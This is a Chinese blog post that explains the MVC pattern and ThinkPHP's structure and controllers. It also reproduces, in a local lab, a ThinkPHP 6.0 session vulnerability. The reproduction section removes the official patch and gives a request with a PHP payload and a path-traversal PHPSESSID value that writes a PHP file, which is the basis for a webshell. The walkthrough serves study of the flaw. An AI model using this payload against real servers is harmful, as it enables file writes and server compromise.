0x01 MVC设计模式
V 即View视图是指用户看到并与之交互的界面。比如由html元素组成的网页界面,或者软件的客户端界面。MVC的好处之一在于它能为应用程序处理很多不同的视图。在视图中其实没有真正的处理发生,它只是作为一种输出数据并允许用户操纵的方式。
M 即model模型是指模型表示业务规则。在MVC的三个部件中,模型拥有最多的处理任务。被模型返回的数据是中立的,模型与数据格式无关,这样一个模型能为多个视图提供数据,由于应用于模型的代码只需写一次就可以被多个视图重用,所以减少了代码的重复性。
C 即controller控制器是指控制器接受用户的输入并调用模型和视图去完成用户的需求,控制器本身不输出任何东西和做任何处理。它只是接收请求并决定调用哪个模型构件去处理请求,然后再确定用哪个视图来显示返回的数据。
MVC举例一:
最典型的MVC就是jsp+servlet+javabean模式。
JavaBean作为模型,既可以作为数据模型来封装业务数据,又可以作为业务逻辑模型来包含应用的业务操作。其中,数据模型用来存储或传递业务数据,而业务逻辑模型接收到控制器传过来的模型更新请求后,执行特定的业务逻辑处理,然后返回相应的执行结果。
JSP作为视图层,负责提供页面为用户展示数据,提供相应的表单(Form)来用于用户的请求,并在适当的时候(点击按钮)向控制器发出请求来请求模型进行更新。
Serlvet作为控制器,用来接收用户提交的请求,然后获取请求中的数据,将之转换为业务模型需要的数据模型,然后调用业务模型相应的业务方法进行更新,同时根据业务执行结果来选择要返回的视图。
Struts2框架:Struts2是基于MVC的轻量级的web应用框架。Struts2的应用范围是Web应用,注重将Web应用领域的日常工作和常见问题抽象化,提供一个平台帮助快速的完成Web应用开发。基于Struts2开发的Web应用自然就能实现MVC,Struts2着力于在MVC的各个部分为开发提供相应帮助。
MVC举例二:
ThinkPHP里的MVC
MVC的优点
1.耦合性低
视图层和业务层分离,这样就允许更改视图层代码而不用重新编译模型和控制器代码,同样,一个应用的业务流程或者业务规则的改变只需要改动MVC的模型层即可。因为模型与控制器和视图相分离,所以很容易改变应用程序的数据层和业务规则。
2.重用性高
MVC模式允许使用各种不同样式的视图来访问同一个服务器端的代码,因为多个视图能共享一个模型,它包括任何WEB(HTTP)浏览器或者无线浏览器(wap),比如,用户可以通过电脑也可通过手机来订购某样产品,虽然订购的方式不一样,但处理订购产品的方式是一样的。由于模型返回的数据没有进行格式化,所以同样的构件能被不同的界面使用。
3.部署快,生命周期成本低
MVC使开发和维护用户接口的技术含量降低。使用MVC模式使开发时间得到相当大的缩减,它使程序员(Java开发人员)集中精力于业务逻辑,界面程序员(HTML和JSP开发人员)集中精力于表现形式上。
4.可维护性高
分离视图层和业务逻辑层也使得WEB应用更易于维护和修改。
MVC的缺点
1.完全理解MVC比较复杂
由于MVC模式提出的时间不长,加上同学们的实践经验不足,所以完全理解并掌握MVC不是一个很容易的过程。
2.调试困难
因为模型和视图要严格的分离,这样也给调试应用程序带来了一定的困难,每个构件在使用之前都需要经过彻底的测试。
3.不适合小型,中等规模的应用程序
在一个中小型的应用程序中,强制性的使用MVC进行开发,往往会花费大量时间,并且不能体现MVC的优势,同时会使开发变得繁琐。
4.增加系统结构和实现的复杂性
对于简单的界面,严格遵循MVC,使模型、视图与控制器分离,会增加结构的复杂性,并可能产生过多的更新操作,降低运行效率。
5.视图与控制器间的过于紧密的连接并且降低了视图对模型数据的访问
视图与控制器是相互分离,但却是联系紧密的部件,视图没有控制器的存在,其应用是很有限的,反之亦然,这样就妨碍了他们的独立重用。
依据模型操作接口的不同,视图可能需要多次调用才能获得足够的显示数据。对未变化数据的不必要的频繁访问,也将损害操作性能。
0x02 Thinkphp环境的搭建与漏洞复现
ThinkPHP6.0的环境要求如下:
PHP >= 7.1.0
6.0版本开始,必须通过Composer方式安装和更新,所以你无法通过Git下载安装。
浏览器搜索 Composer-> 进行下载 ->Composer-Setup.exe
路径选为D:\phpStudy\PHPTutorial\php->php-7.1.13-nts(要大于7.1.10)
下载完后cmd输入命令:composer 检测,安装成功。
tp文件的配置
在phpstudy的根目录下:cmd输入命令:composer create-project topthink/think tp 6.0.0
tp 文件夹名称
6.0.0 版本号
php think run 运行开发环境
漏洞文件位置:
D:\phpStudy\PHPTutorial\WWW\tp\vendor\topthink\framework\src\think\session\Store.php
注意要点:删除官方打的补丁–>ctype_alnum函数
必要条件:
环境开启Session的条件下,此漏洞经过构造可进行任意文件删除
环境开启Session且Session中的数据可控的情况下,可以通过此操作达到构造webshell的目的
步骤一:
\tp\app\controller\index.php添加
use think\facade\Session; //session
$test=request()->only(['a']); //index方法中写入
Session::set("test",$test['a']); //index方法中写入
步骤二:
tp\app\middleware.php 打开session信息
\think\middleware\SessionInit::class
步骤三:
http://127.0.0.1/tp/public/index.php?a=%3C?php%20phpinfo();?%3E
PHPSESSID=…/…/…/…/ranchen123456789.php 要写入的文件
验证:
Thinkphp系统结构与控制器
ThinkPHP简单结构介绍:
application : 应用
extend:扩展 扩展内库
public:入口文件 index.php 在里面
runtime:缓存文件(里面的文件可以随便删除)
thinkphp:tinkphp的核心框架
vendor:第三方的内库
架构总览https://www.kancloud.cn/manual/thinkphp6_0/1037486
系统流程:
1.用户URL请求
2.调用应用入口文件(通常是网站的index.php)
3.载入框架入口文件(ThinkPHP.php)
4.记录初始运行时间和内存开销
5.系统常量判断及定义
6.载入框架引导类(Think\Think)并执行Think::start方法进行应用初始化
控制器:
按照ThinkPHP的架构设计,所有的URL请求(无论是否采用了路由),最终都会定位到控制器(也许实际的类不一定是控制器类,但也属于广义范畴的控制器)。控制器的层可能有很多,为了便于区分就把通过URL访问的控制器称之为访问控制器(通常意义上我们所说的控制器就是指访问控制器)。
ThinkPHP 的控制器定义比较灵活,可以无需继承任何的基础类,也或者根据业务需求封装自己的基础控制器类。
控制器文件通常放在controller下面,类名和文件名保持大小写一致,并采用驼峰命名(首字母大写)。
如果要改变controller目录名,需要在route.php配置文件中设置:
单应用模式:
多应用模式:
基础控制器:
空控制器:
资源控制器:
设置后会自动注册7个路由规则,对应资源控制器的7个方法,更多内容请参考开发文档资源路由章节。
控制器中间件:
中间件传参:
扫一扫
1064
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
